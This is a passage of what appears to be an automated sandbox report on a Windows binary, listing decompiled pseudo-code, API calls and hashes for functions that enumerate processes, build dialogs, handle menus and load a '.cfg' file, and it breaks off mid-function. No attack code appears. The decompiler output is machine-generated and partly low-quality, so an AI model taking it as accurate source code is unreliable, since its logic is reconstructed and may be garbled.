                                                                                                                                                      • Instruction ID: 89c1d54e0424cdf8955af57a35c4f81b258c2803f9b3bbee4052a97a94dd298f
                                                                                                                                                      • Opcode Fuzzy Hash: dd6e75e1c219d61954c27f946452bcb1a006fb049640af874a458e11e3f78cea
                                                                                                                                                      • Instruction Fuzzy Hash: 61E08672B8830131F93452452E03B2A2190EA94B18F724C7BF54BF05D2E6FD9874650F
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040CBD8, Relevance: 9.1, APIs: 6, Instructions: 141COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 38%
                                                                                                                                                      			E0040CBD8(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t69;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;
				void* _t109;

				_t106 = _t105 & 0xfffffff8;
				E0040E340(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E0040591F() == 0) {
					L12:
					__eflags =  *0x41325c - _t98; // 0x0
					if(__eflags != 0) {
						_t89 = _a4;
						_t58 =  *0x4128dc(8, _t89);
						__eflags = _t58 - 0xffffffff;
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x4128d4(_t58,  &_a560);
							while(1) {
								__eflags = _t59;
								if(_t59 == 0) {
									goto L18;
								}
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								_t69 = E0040CDF8(_a8,  &_a8);
								__eflags = _t69;
								if(_t69 != 0) {
									_t59 =  *0x4128d0(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t109 =  *0x413260 - _t98; // 0x0
					if(_t109 == 0) {
						goto L12;
					} else {
						_t72 = OpenProcess(0x410, 0, _a4);
						_v0 = _t72;
						if(_t72 != 0) {
							_push( &_a4);
							_push(0x8000);
							_push( &_a2160);
							_push(_t72);
							if( *0x4128e0() != 0) {
								_t6 =  &_v12;
								 *_t6 = _v12 >> 2;
								_v8 = 1;
								_t90 = 0;
								if( *_t6 != 0) {
									while(1) {
										_a1616 = _t98;
										memset( &_a1618, _t98, 0x208);
										memset( &_a8, _t98, 0x21c);
										_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
										_t106 = _t106 + 0x18;
										_a8 = _a4;
										_a12 = _t78;
										 *0x4128d8(_v16, _t78,  &_a1616, 0x104);
										E0040CAF2( &_v0,  &_a1600);
										_push(0xc);
										_push( &_v20);
										_push(_v4);
										_push(_v32);
										if( *0x4128e4() != 0) {
											_a508 = _v32;
											_a512 = _v36;
										}
										if(E0040CDF8(_a8,  &_v24) == 0) {
											goto L18;
										}
										_t90 = _t90 + 1;
										if(_t90 < _v44) {
											_t98 = 0;
											__eflags = 0;
											continue;
										} else {
										}
										goto L18;
									}
								}
							}
							L18:
							CloseHandle(_v16);
						}
					}
				}
				return _a8;
			}


























                                                                                                                                                      0x0040cbdb
                                                                                                                                                      0x0040cbe3
                                                                                                                                                      0x0040cbeb
                                                                                                                                                      0x0040cbed
                                                                                                                                                      0x0040cbf8
                                                                                                                                                      0x0040cd1b
                                                                                                                                                      0x0040cd1b
                                                                                                                                                      0x0040cd21
                                                                                                                                                      0x0040cd27
                                                                                                                                                      0x0040cd2d
                                                                                                                                                      0x0040cd33
                                                                                                                                                      0x0040cd36
                                                                                                                                                      0x0040cd3a
                                                                                                                                                      0x0040cd4e
                                                                                                                                                      0x0040cd56
                                                                                                                                                      0x0040cd5d
                                                                                                                                                      0x0040cddf
                                                                                                                                                      0x0040cddf
                                                                                                                                                      0x0040cde1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cd70
                                                                                                                                                      0x0040cd7c
                                                                                                                                                      0x0040cd8d
                                                                                                                                                      0x0040cd91
                                                                                                                                                      0x0040cd9d
                                                                                                                                                      0x0040cdab
                                                                                                                                                      0x0040cdae
                                                                                                                                                      0x0040cdbd
                                                                                                                                                      0x0040cdc4
                                                                                                                                                      0x0040cdc9
                                                                                                                                                      0x0040cdcb
                                                                                                                                                      0x0040cdd9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cdd9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cdcb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cddf
                                                                                                                                                      0x0040cd3a
                                                                                                                                                      0x0040cbfe
                                                                                                                                                      0x0040cbfe
                                                                                                                                                      0x0040cc04
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cc0a
                                                                                                                                                      0x0040cc13
                                                                                                                                                      0x0040cc1b
                                                                                                                                                      0x0040cc1f
                                                                                                                                                      0x0040cc29
                                                                                                                                                      0x0040cc2a
                                                                                                                                                      0x0040cc36
                                                                                                                                                      0x0040cc37
                                                                                                                                                      0x0040cc40
                                                                                                                                                      0x0040cc46
                                                                                                                                                      0x0040cc46
                                                                                                                                                      0x0040cc4b
                                                                                                                                                      0x0040cc53
                                                                                                                                                      0x0040cc55
                                                                                                                                                      0x0040cc5f
                                                                                                                                                      0x0040cc6d
                                                                                                                                                      0x0040cc75
                                                                                                                                                      0x0040cc85
                                                                                                                                                      0x0040cc8d
                                                                                                                                                      0x0040cc94
                                                                                                                                                      0x0040cc9c
                                                                                                                                                      0x0040ccad
                                                                                                                                                      0x0040ccb1
                                                                                                                                                      0x0040ccc2
                                                                                                                                                      0x0040ccc7
                                                                                                                                                      0x0040cccd
                                                                                                                                                      0x0040ccce
                                                                                                                                                      0x0040ccd2
                                                                                                                                                      0x0040ccde
                                                                                                                                                      0x0040cce4
                                                                                                                                                      0x0040ccef
                                                                                                                                                      0x0040ccef
                                                                                                                                                      0x0040cd05
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cd0b
                                                                                                                                                      0x0040cd10
                                                                                                                                                      0x0040cc5d
                                                                                                                                                      0x0040cc5d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cd16
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cd10
                                                                                                                                                      0x0040cc5f
                                                                                                                                                      0x0040cc55
                                                                                                                                                      0x0040cde3
                                                                                                                                                      0x0040cde7
                                                                                                                                                      0x0040cde7
                                                                                                                                                      0x0040cc1f
                                                                                                                                                      0x0040cc04
                                                                                                                                                      0x0040cdf7

                                                                                                                                                      APIs
                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040C2CF,00000000,00000000), ref: 0040CC13
                                                                                                                                                      • memset.MSVCRT ref: 0040CC75
                                                                                                                                                      • memset.MSVCRT ref: 0040CC85
                                                                                                                                                        • Part of subcall function 0040CAF2: wcscpy.MSVCRT ref: 0040CB1B
                                                                                                                                                      • memset.MSVCRT ref: 0040CD70
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040CD91
                                                                                                                                                      • CloseHandle.KERNEL32(?,0040C2CF,?,?,?,0040C2CF,00000000,00000000), ref: 0040CDE7
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3300951397-0
                                                                                                                                                      • Opcode ID: 1fcad76c0bd3129941d7854f28fd29f69da4d45da8680cfa1fd3405ce168179b
                                                                                                                                                      • Instruction ID: e16d66228f4dae7d6f5bcc77b9324eed5b76837c7fa80b75a9be3f82a58a018a
                                                                                                                                                      • Opcode Fuzzy Hash: 1fcad76c0bd3129941d7854f28fd29f69da4d45da8680cfa1fd3405ce168179b
                                                                                                                                                      • Instruction Fuzzy Hash: 93513C71108344EBD720EF65C884A9BBBE8FF84304F004A3EF589E6191DB75D945CB5A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004036F7, Relevance: 9.1, APIs: 6, Instructions: 106windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 90%
                                                                                                                                                      			E004036F7(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				struct HWND__* _t29;
				intOrPtr* _t54;
				struct HWND__* _t61;
				struct HWND__* _t62;
				intOrPtr* _t66;
				void* _t67;
				intOrPtr* _t68;

				_t58 = __edx;
				_push(__ebx);
				_t66 = __ecx;
				E00401712( *((intOrPtr*)(__ecx + 0x10)), __edx, __ecx + 0x40, __eflags);
				_t61 = GetDlgItem( *(_t66 + 0x10), 0x40c);
				E00405700(_t61, E00406827(0x2ef), 1);
				E00405700(_t61, E00406827(0x2f0), 2);
				SendMessageW(_t61, 0x160, 0x15e, 0);
				_t62 = GetDlgItem( *(_t66 + 0x10), 0x40e);
				E00405700(_t62, E00406827(0x2f9), 1);
				E00405700(_t62, E00406827(0x2fa), 2);
				E00405700(_t62, E00406827(0x2fb), 3);
				E00405700(_t62, E00406827(0x2fc), 4);
				E00405700(_t62, E00406827(0x2fd), 5);
				SendMessageW(_t62, 0x160, 0x15e, 0);
				_t29 = GetDlgItem( *(_t66 + 0x10), 0x40f);
				_t63 = _t29;
				SendMessageW(_t29, 0x160, 0x15e, 0);
				E00405700(_t29, E00406827(0x30d), 1);
				E00405700(_t63, E00406827(0x30e), 2);
				_t54 = _t66;
				_pop(_t67);
				_t68 = _t54;
				 *((intOrPtr*)( *_t68 + 4))(1, _t67);
				 *((intOrPtr*)( *_t68 + 0x1c))();
				E00405B17(_t58,  *((intOrPtr*)(_t68 + 0x10)), 4);
				return 0;
			}










                                                                                                                                                      0x004036f7
                                                                                                                                                      0x004036f7
                                                                                                                                                      0x004036fa
                                                                                                                                                      0x00403703
                                                                                                                                                      0x0040371f
                                                                                                                                                      0x00403728
                                                                                                                                                      0x0040373a
                                                                                                                                                      0x0040374f
                                                                                                                                                      0x00403766
                                                                                                                                                      0x0040376f
                                                                                                                                                      0x00403781
                                                                                                                                                      0x00403797
                                                                                                                                                      0x004037a9
                                                                                                                                                      0x004037bf
                                                                                                                                                      0x004037da
                                                                                                                                                      0x004037e4
                                                                                                                                                      0x004037e6
                                                                                                                                                      0x004037f5
                                                                                                                                                      0x00403805
                                                                                                                                                      0x00403817
                                                                                                                                                      0x00403820
                                                                                                                                                      0x00403822
                                                                                                                                                      0x0040165a
                                                                                                                                                      0x00401660
                                                                                                                                                      0x00401667
                                                                                                                                                      0x0040166f
                                                                                                                                                      0x00401679

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00401712: GetClientRect.USER32 ref: 0040171E
                                                                                                                                                        • Part of subcall function 00401712: GetWindow.USER32(?,00000005), ref: 00401737
                                                                                                                                                        • Part of subcall function 00401712: GetWindow.USER32(00000000), ref: 0040173A
                                                                                                                                                        • Part of subcall function 00401712: GetWindow.USER32(00000000,00000002), ref: 0040174C
                                                                                                                                                      • GetDlgItem.USER32 ref: 00403716
                                                                                                                                                        • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                        • Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                        • Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F
                                                                                                                                                        • Part of subcall function 00405700: SendMessageW.USER32(?,00000143,00000000,?), ref: 00405717
                                                                                                                                                        • Part of subcall function 00405700: SendMessageW.USER32(?,00000151,00000000,?), ref: 00405729
                                                                                                                                                        • Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                        • Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
                                                                                                                                                        • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040374F
                                                                                                                                                      • GetDlgItem.USER32 ref: 0040375D
                                                                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 004037DA
                                                                                                                                                      • GetDlgItem.USER32 ref: 004037E4
                                                                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 004037F5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$ItemWindow$HandleModule$ClientLoadRectStringmemcpywcscpywcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3030901043-0
                                                                                                                                                      • Opcode ID: 1047b60b3950c8a152ac73b551837c30685554d49de1232bf18ecab51a8f137e
                                                                                                                                                      • Instruction ID: 086a44b27e78f4b83ae4b6e77ae60044790fc96d4b444eb8a6a68cf3e2127a69
                                                                                                                                                      • Opcode Fuzzy Hash: 1047b60b3950c8a152ac73b551837c30685554d49de1232bf18ecab51a8f137e
                                                                                                                                                      • Instruction Fuzzy Hash: 9E21A3B6640700B7E11132625C87F3B26ACDB45B2DF42143EFB517A1C3D9BE5816256D
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00401810, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 44%
                                                                                                                                                      			E00401810(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}





                                                                                                                                                      0x0040181f
                                                                                                                                                      0x00401836
                                                                                                                                                      0x00401840
                                                                                                                                                      0x00401848
                                                                                                                                                      0x00401849
                                                                                                                                                      0x0040184d
                                                                                                                                                      0x00401852
                                                                                                                                                      0x00401862
                                                                                                                                                      0x00401878

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 19018683-0
                                                                                                                                                      • Opcode ID: c8a69a874f342f7a3e97f07006a698148a3ee1bf1249d9731753e706e314068b
                                                                                                                                                      • Instruction ID: 1a6c8e31efcae22bf085037e8d33cf81da157de282c50ef6ca12fa9021a14783
                                                                                                                                                      • Opcode Fuzzy Hash: c8a69a874f342f7a3e97f07006a698148a3ee1bf1249d9731753e706e314068b
                                                                                                                                                      • Instruction Fuzzy Hash: 7A01FF72900218EFDF14DFA4DD459FE7B79FB45301F000479EA11BA194DA71AA08CB50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040B659, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122windowkeyboardCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040B659(intOrPtr __ecx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void _v518;
				signed short _v520;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t46;
				void* _t64;
				intOrPtr* _t71;
				intOrPtr _t73;

				_t67 = __ecx;
				_t73 = __ecx;
				_t71 = _a8;
				_v8 = __ecx;
				if(_a4 == 0x101 &&  *((intOrPtr*)(_t71 + 8)) == 0xfffffffe &&  *((intOrPtr*)(_t71 + 0xc)) == 1) {
					_v520 = _v520 & 0x00000000;
					memset( &_v518, 0, 0x1fe);
					E00401000( &_v520, _t67, 0x41203c);
					_t46 = E00405CD2( *((intOrPtr*)(_t73 + 0x208)),  &_v520);
					_t71 = _a8;
				}
				if( *(_t71 + 4) == 0x103 &&  *((intOrPtr*)(_t71 + 8)) == 0xfffffff4) {
					_t46 = E00407DC0( *((intOrPtr*)(_t73 + 0x69c)), _t71);
					 *((intOrPtr*)(_t73 + 0x20c)) = 1;
					 *(_t73 + 0x210) = _t46;
				}
				if( *((intOrPtr*)(_t71 + 8)) == 0xfffffdee) {
					_t46 = SendMessageW( *(_t73 + 0x218), 0x423, 0, 0);
					if( *_t71 == _t46) {
						_t46 = GetMenuStringW( *(_t73 + 0x21c),  *(_t71 + 4), _t71 + 0x10, 0x4f, 0);
						 *(_t71 + 0xb0) =  *(_t71 + 0xb0) & 0x00000000;
					}
				}
				if(_a4 != 0x103) {
					L29:
					return _t46;
				} else {
					if( *((intOrPtr*)(_t71 + 8)) == 0xfffffffd) {
						_t46 = E0040B0C2(_t73);
						_t71 = _a8;
					}
					if( *((intOrPtr*)(_t71 + 8)) == 0xffffff94) {
						_t64 = 0;
						if(GetKeyState(0x10) < 0) {
							_t64 = 1;
						}
						_t46 = E00407CA2( *(_t71 + 0x10), _t67,  *((intOrPtr*)(_t73 + 0x69c)), 0, _t64);
						_t73 = _v8;
						_t71 = _a8;
					}
					_t68 =  *((intOrPtr*)(_t73 + 0x69c));
					if( *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x69c)) + 0x2f4)) != 0) {
						_t92 =  *((intOrPtr*)(_t71 + 8)) - 0xffffff4f;
						if( *((intOrPtr*)(_t71 + 8)) == 0xffffff4f) {
							_t46 = E0040824E(_t71, _t68, _t92);
						}
						if( *((intOrPtr*)(_t71 + 8)) == 0xffffff4d) {
							_t63 =  *((intOrPtr*)(_t73 + 0x69c));
							_t46 = E004081B3(_t71,  *((intOrPtr*)(_t73 + 0x69c)), 0);
							if(_t46 == 0xffffffff && ( *(_t71 + 0x10) & 0x0000000c) != 0) {
								_t46 = E004081B3(_t71, _t63, 1);
							}
							 *((intOrPtr*)(_t73 + 0x20c)) = 1;
							 *(_t73 + 0x210) = _t46;
						}
					}
					if( *((intOrPtr*)(_t71 + 8)) != 0xffffff9b) {
						goto L29;
					} else {
						_t46 = E00402D29(_t71);
						if(_t46 == 0) {
							goto L29;
						}
						_t46 = _t73 + 0x280;
						if( *_t46 != 0) {
							goto L29;
						}
						 *_t46 = 1;
						return E00401BDC(_t73, 0x402);
					}
				}
			}













                                                                                                                                                      0x0040b659
                                                                                                                                                      0x0040b66b
                                                                                                                                                      0x0040b66e
                                                                                                                                                      0x0040b671
                                                                                                                                                      0x0040b674
                                                                                                                                                      0x0040b682
                                                                                                                                                      0x0040b698
                                                                                                                                                      0x0040b6a8
                                                                                                                                                      0x0040b6b6
                                                                                                                                                      0x0040b6bb
                                                                                                                                                      0x0040b6be
                                                                                                                                                      0x0040b6c9
                                                                                                                                                      0x0040b6d7
                                                                                                                                                      0x0040b6dc
                                                                                                                                                      0x0040b6e6
                                                                                                                                                      0x0040b6e6
                                                                                                                                                      0x0040b6f3
                                                                                                                                                      0x0040b704
                                                                                                                                                      0x0040b70c
                                                                                                                                                      0x0040b71f
                                                                                                                                                      0x0040b725
                                                                                                                                                      0x0040b725
                                                                                                                                                      0x0040b70c
                                                                                                                                                      0x0040b72f
                                                                                                                                                      0x0040b810
                                                                                                                                                      0x0040b810
                                                                                                                                                      0x0040b735
                                                                                                                                                      0x0040b739
                                                                                                                                                      0x0040b73d
                                                                                                                                                      0x0040b742
                                                                                                                                                      0x0040b742
                                                                                                                                                      0x0040b749
                                                                                                                                                      0x0040b74d
                                                                                                                                                      0x0040b758
                                                                                                                                                      0x0040b75a
                                                                                                                                                      0x0040b75a
                                                                                                                                                      0x0040b767
                                                                                                                                                      0x0040b76c
                                                                                                                                                      0x0040b76f
                                                                                                                                                      0x0040b76f
                                                                                                                                                      0x0040b772
                                                                                                                                                      0x0040b77f
                                                                                                                                                      0x0040b781
                                                                                                                                                      0x0040b788
                                                                                                                                                      0x0040b78c
                                                                                                                                                      0x0040b78c
                                                                                                                                                      0x0040b798
                                                                                                                                                      0x0040b79a
                                                                                                                                                      0x0040b7a6
                                                                                                                                                      0x0040b7ae
                                                                                                                                                      0x0040b7bc
                                                                                                                                                      0x0040b7bc
                                                                                                                                                      0x0040b7c1
                                                                                                                                                      0x0040b7cb
                                                                                                                                                      0x0040b7cb
                                                                                                                                                      0x0040b798
                                                                                                                                                      0x0040b7d5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b7d7
                                                                                                                                                      0x0040b7e6
                                                                                                                                                      0x0040b7ed
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b7ef
                                                                                                                                                      0x0040b7f8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b7fa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b807
                                                                                                                                                      0x0040b7d5

                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040B698
                                                                                                                                                        • Part of subcall function 00405CD2: ShellExecuteW.SHELL32(?,open,?,0040F454,0040F454,00000005), ref: 00405CE8
                                                                                                                                                      • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 0040B704
                                                                                                                                                      • GetMenuStringW.USER32 ref: 0040B71F
                                                                                                                                                      • GetKeyState.USER32(00000010), ref: 0040B74F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                      • String ID: < A
                                                                                                                                                      • API String ID: 3550944819-1181716546
                                                                                                                                                      • Opcode ID: c907c4734865cfa602ecd8c77a846019eba843dd06bc836bba2509596532bbff
                                                                                                                                                      • Instruction ID: cd89550f5cd4c0fed4b6d451fcd4293cb33e7e96a54fd1b4e036968a3aaec8cf
                                                                                                                                                      • Opcode Fuzzy Hash: c907c4734865cfa602ecd8c77a846019eba843dd06bc836bba2509596532bbff
                                                                                                                                                      • Instruction Fuzzy Hash: 9541A570600705EBDB20AF25C8897A6B365FF50325F10863EE5796B6D1C7B9AC91CB8C
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040B147, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040B147(void* __eax, void* __ecx, intOrPtr _a4) {
				void _v526;
				long _v528;
				short _v1050;
				long _v1572;
				intOrPtr _v1576;
				char _v1580;
				void* __ebx;
				void* __edi;
				void* __esi;
				wchar_t* _t24;
				void* _t41;
				void* _t42;

				_t41 = __ecx;
				_t42 = __eax;
				if( *((intOrPtr*)(__eax + 0x27c)) == 0) {
					_v528 = 0;
					memset( &_v526, 0, 0x208);
					E00405800( &_v528);
					_t24 = wcsrchr( &_v528, 0x2e);
					if(_t24 != 0) {
						 *_t24 = 0;
					}
					wcscat( &_v528, L".cfg");
					_v1576 = _a4;
					_v1580 = 0x410838;
					_v1572 = 0;
					_v1050 = 0;
					wcscpy( &_v1572,  &_v528);
					E0040D909( &_v1580);
					_t45 =  &_v1580;
					E00401C0A( *((intOrPtr*)(_t42 + 0x698)),  &_v1580);
					E0040196B(_t42, _t41,  &_v1580);
					return E004077F5(_t45, _t41,  *((intOrPtr*)(_t42 + 0x69c)));
				}
				return __eax;
			}















                                                                                                                                                      0x0040b147
                                                                                                                                                      0x0040b152
                                                                                                                                                      0x0040b15c
                                                                                                                                                      0x0040b16f
                                                                                                                                                      0x0040b176
                                                                                                                                                      0x0040b182
                                                                                                                                                      0x0040b190
                                                                                                                                                      0x0040b19a
                                                                                                                                                      0x0040b19c
                                                                                                                                                      0x0040b19c
                                                                                                                                                      0x0040b1ac
                                                                                                                                                      0x0040b1b4
                                                                                                                                                      0x0040b1c8
                                                                                                                                                      0x0040b1d2
                                                                                                                                                      0x0040b1d9
                                                                                                                                                      0x0040b1e0
                                                                                                                                                      0x0040b1ee
                                                                                                                                                      0x0040b1f9
                                                                                                                                                      0x0040b1ff
                                                                                                                                                      0x0040b206
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b218
                                                                                                                                                      0x0040b21c

                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040B176
                                                                                                                                                        • Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B
                                                                                                                                                      • wcsrchr.MSVCRT ref: 0040B190
                                                                                                                                                      • wcscat.MSVCRT ref: 0040B1AC
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040B1E0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileModuleNamememsetwcscatwcscpywcsrchr
                                                                                                                                                      • String ID: .cfg
                                                                                                                                                      • API String ID: 3959449883-3410578098
                                                                                                                                                      • Opcode ID: c10ae3566cda4adbb0fcd7ff867f165b55a5c0b0dedcdb095373c37a526f42fc
                                                                                                                                                      • Instruction ID: 6b4b3dac03b364a6e9d67aab511530dcf3da6c65583dd03dece53c0e4fe42f45
                                                                                                                                                      • Opcode Fuzzy Hash: c10ae3566cda4adbb0fcd7ff867f165b55a5c0b0dedcdb095373c37a526f42fc
                                                                                                                                                      • Instruction Fuzzy Hash: 0611BC739016285ACB20EB65CC45ACEB37DEF48314F0041F7E518B7142E7759A958F9D
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00408E65, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 54%
                                                                                                                                                      			E00408E65(void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t30;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				_t38 = __ecx;
				E00408857(__edi, __ecx, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x34)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
